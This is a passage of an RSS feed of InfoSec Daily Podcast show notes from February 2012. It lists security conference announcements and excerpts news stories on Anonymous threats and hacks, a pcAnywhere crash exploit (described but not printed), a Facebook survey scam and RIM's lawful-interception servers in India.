	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Journal states that </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;the group has never listed a power blackout as a goal, but some federal officials believe Anonymous is headed in a more disruptive direction. An attack on a network would be consistent with recent public claims and threats by the group.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the main challenges in protecting these networks is the fact that these systems were not necessarily designed with cybersecurity in mind. Rather, the security solutions have been layered on in a piecemeal fashion after the networks were operational, leaving ample room for attackers to compromise their functionality.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the fall of 2011, Pike Research released a report examining the state of utility cyber security. The report concluded that although a great deal of attention has shifted to protecting systems that govern infrastructure, utilities have a long way to go in protecting critical networks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Utility cyber security is in a state of near chaos. After years of vendors selling point solutions, utilities investing in compliance minimums rather than full security, and attackers having nearly free rein, the attackers clearly have the upper hand. Many attacks simply cannot be defended,&quot;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> the researchers stated.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, the Journal goes on to report that utility officials believe the threat of a catastrophic event is in highly unlikely, and that current security precautions are effective in defeating attacks on a daily basis.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Grid officials said their systems face regular attacks, and they devote tremendous resources to repelling invaders, whether from Anonymous or some other source. &#39;The industry is engaged and stepping up widely to respond to emerging cyber threats; said one electric-industry official. &#39;There is a recognition that there are groups out there like Anonymous, and we are concerned, as are other sectors.&#39; Another industry official noted that the electric grid has a number of backup systems that allow utilities to restore power quickly if it is taken out by a cyberattack or other event.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://news.softpedia.com/news/Anonymous-Denies-Targeting-the-DNS-Root-Servers-254385.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Anonymous-Denies-Targeting-the-DNS-Root-Servers-254385.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is what happens when there is no clear hierarchy in a group. After some Anonymous hackers revealed their plans to take down the 13 DNS root servers of the Internet on March 31, official channels began denying these claims.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since any hacker can call himself Anonymous these days, situations in which not all the hacktivists agree with each other are bound to appear.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;GlobalBlackOut is another Fake Operation. No intention of #Anonymous to cut Internet. Please stop asking about it,&rdquo; Anonymous representatives said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another official Twitter channel wrote, &ldquo;Just a message to our followers, this news team does not support OpBlackOut and that everyone should stay away from it. Thank you.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As far as we know </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">YourAnonNews</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, one of the oldest Anonymous Twitter pages, hasn&rsquo;t made any statement regarding the attack on the DNS servers, which may indicate that the subject is not worth their attention.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This doesn&rsquo;t necessarily mean that the operation is off, instead it means that not all hacktivists agree with it. As some may remember, even after the Stratfor hack, which clearly turned out to be run by the &ldquo;real&rdquo; Anonymous, some hackers wrote a statement denying they would target a company that helps others gather intel. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-601-pcanywhere-crash-dit-doh-shadow-network-nsa-globalfakeout/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3537/0/infosec-daily-podcast-episode-601.mp3" length="15989951" type="audio/mpeg" />
		<itunes:duration>0:33:16</itunes:duration>
		<itunes:subtitle>Episode 601 &#8211; &#160;pcAnywhere Crash, DIT Doh, Shadow Network, NSA &#38; GlobalFakeOut
	InfoSec Daily Podcast Episode 601 for February 22, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
	[...]</itunes:subtitle>
		<itunes:summary>Episode 601 &#8211; &#160;pcAnywhere Crash, DIT Doh, Shadow Network, NSA &#38; GlobalFakeOut
	InfoSec Daily Podcast Episode 601 for February 22, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open! &#160;If you have some Anti-Forensics talks, that would be awesome.
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: &#160;Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.informationweek.com/news/security/vulnerabilities/232601182
	Code has been published that attackers could use to crash fully patched versions of pcAnywhere on any Windows PC, without first having to authenticate to the PC.
	The exploit details arrived Friday in the form of a Pastebin post from Johnathan Norman, director of security research at Alert Logic. Advertised as a &#34;PCAnywhere Nuke,&#34; the Python code can be used to create a denial of service (DoS) by crashing &#34;the ashost32 service,&#34; he said in the post. &#34;It&#39;ll be respawned so if you want to be a real pain you&#39;ll need to loop this&#8230;my initial impressions are that controlling execution will be a pain.&#34; He said the exploit works even against the most recent, fully patched version of pcAnywhere (version 12.5.0 build 463 and earlier).
	&#34;Symantec is aware of the posting and is investigating the claims,&#34; said Symantec spokeswoman Katherine James via email. &#34;We have no additional information to provide at this time.&#34;
	&#8230;.
	Source: &#160;http://pastebin.com/VXkWDM6A
	&#8230;.
	Source: &#160;http://timesofindia.indiatimes.com/tech/news/internet/Govt-to-ask-Yahoo-Gmail-to-route-all-mails-through-servers-in-India/articleshow/11978553.cms
	Internet content providers Yahoo, Gmail and others would be asked to route all emails accessed in India through the country even if the mail account is registered outside the country.
	The move comes in the wake of instances where security agencies could not have a real-time access to some emails as they were registered outside the country but were opened in India.
	During a recent high-level meeting held in the office of Union Home Secretary R K [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 600 &#8211; “Ex-Girlfriend” Scam, Attack Friday, RIM’s Backdoor Sniffed, F’ing Indian Scammer and Iran Homegrown Software</title>
		<link>http://www.isdpodcast.com/episode-600-ex-girlfriend-scam-attack-friday-rims-backdoor-sniffed-fing-indian-scammer-and-iran-homegrown-software</link>
		<comments>http://www.isdpodcast.com/episode-600-ex-girlfriend-scam-attack-friday-rims-backdoor-sniffed-fing-indian-scammer-and-iran-homegrown-software#comments</comments>
		<pubDate>Wed, 22 Feb 2012 01:51:40 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3533</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 600 for February 21, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, &#160;Adrian Crenshaw, Karthik Rangarajan, Themson Mester, Dr. Bonez, and Varun Sharma. &#160; Announcements: Social Engineering Training When: March 5-9, 2012 Where: Seattle, Washington When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 600 for February 21, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, &nbsp;Adrian Crenshaw, Karthik Rangarajan, Themson Mester, Dr. Bonez, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open! &nbsp;If you have some Anti-Forensics talks, that would be awesome.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA </span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://net-security.org/secworld.php?id=12434"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://net-security.org/secworld.php?id=12434</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Survey scammers love targeting Facebook users, because the social nature of the network makes sure that the scam will be propagated far and wide.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest of these scams has been hitting the Walls of compromised accounts with posts containing a thumbnail suggesting a link to a sex video, accompanied with the following message: &quot;[Video] WOW.. watch what Happened to his Ex Girlfriend!! [LINK] Omg. I cant believe this actually happened to his Ex-Girlfreind!&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Sophos, friends of the user whose compromised account posted the message have also been named in it, assuring that at least some of them will surely check out the message.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Those that follow the link are asked to install a &quot;Divx plugin&quot; in order to see the video &#8211; which, by the way, is not even the same video they wanted to see:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.wired.com/threatlevel/2012/02/anonymous-friday-attacks/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2012/02/anonymous-friday-attacks/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous, a group not known for discipline, is giving itself a weekly deadline, a new attack every Friday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Following the Tuesday compromise of the website of tear gas maker Combined Systems, Inc., the Antisec wing of Anonymous struck a Federal Trade Commission webserver which hosts three FTC websites, business.ftc.gov, consumer.gov and ncpw.gov, the National Consumer Protection Week partnership website.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Claiming this hack in opposition of the controversial international copyright treaty known as ACTA, which had been widely protested around the world for its potential to curtail freedom of expression on the internet, Anonymous continued the political messaging that has marked much of its recent high-profile actions.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anons claiming responsibility for the attack spoke to Wired.com in an online chat just as it happened, freely admitting that there was nothing technically remarkable in this hack. As one remarked, &ldquo;own &amp; rm and move on.&rdquo; (rm being a unix command to delete data.)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But this week&rsquo;s attacks came with a promise, first articulated in the defacement of CSI, and restated on the FTC websites: Every Friday will bring a new attack against government and corporate sites under the theme of #FFF, or Fuck the FBI Friday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We are already sitting on dozens of unreleased targets,&rdquo; said an Antisec anon, who went on to describe an inventory of already compromised servers that could fill five months or more of #FFF releases.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Yes, each and every Friday we will be launching attacks&hellip; with the specific purpose of wiping as many corrupt corporate and government systems off our internet,&rdquo; the anon continued.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The choice of the FTC is an odd one, given the independent agency has no role in ACTA negotiations. Instead, it&rsquo;s tasked with fighting unfair business practices, sanctioning companies like Google and Facebook for privacy violations, and running the Do-Not-Call list &ndash; hardly the stuff of Big Brother stomping on online rights forever.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2012/02/21/rim_india_bbn_server/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/02/21/rim_india_bbn_server/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Research In Motion is finally set to offer the Indian authorities a permanent system for access to its consumer-focused messaging services with the installation of new Mumbai-based servers.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Times of India</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> was given a government briefing on the matter. It claimed that the servers have been inspected by government officials and that permission would shortly be granted by the BlackBerry maker for lawful interception of messages if the intelligence agencies there suspect terrorist or other serious illegal activity is being conducted via the platform.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is also believed that RIM was co-operating with the authorities before this on ad hoc requests to access any email or BBM messages sent over its consumer service.</span></p>
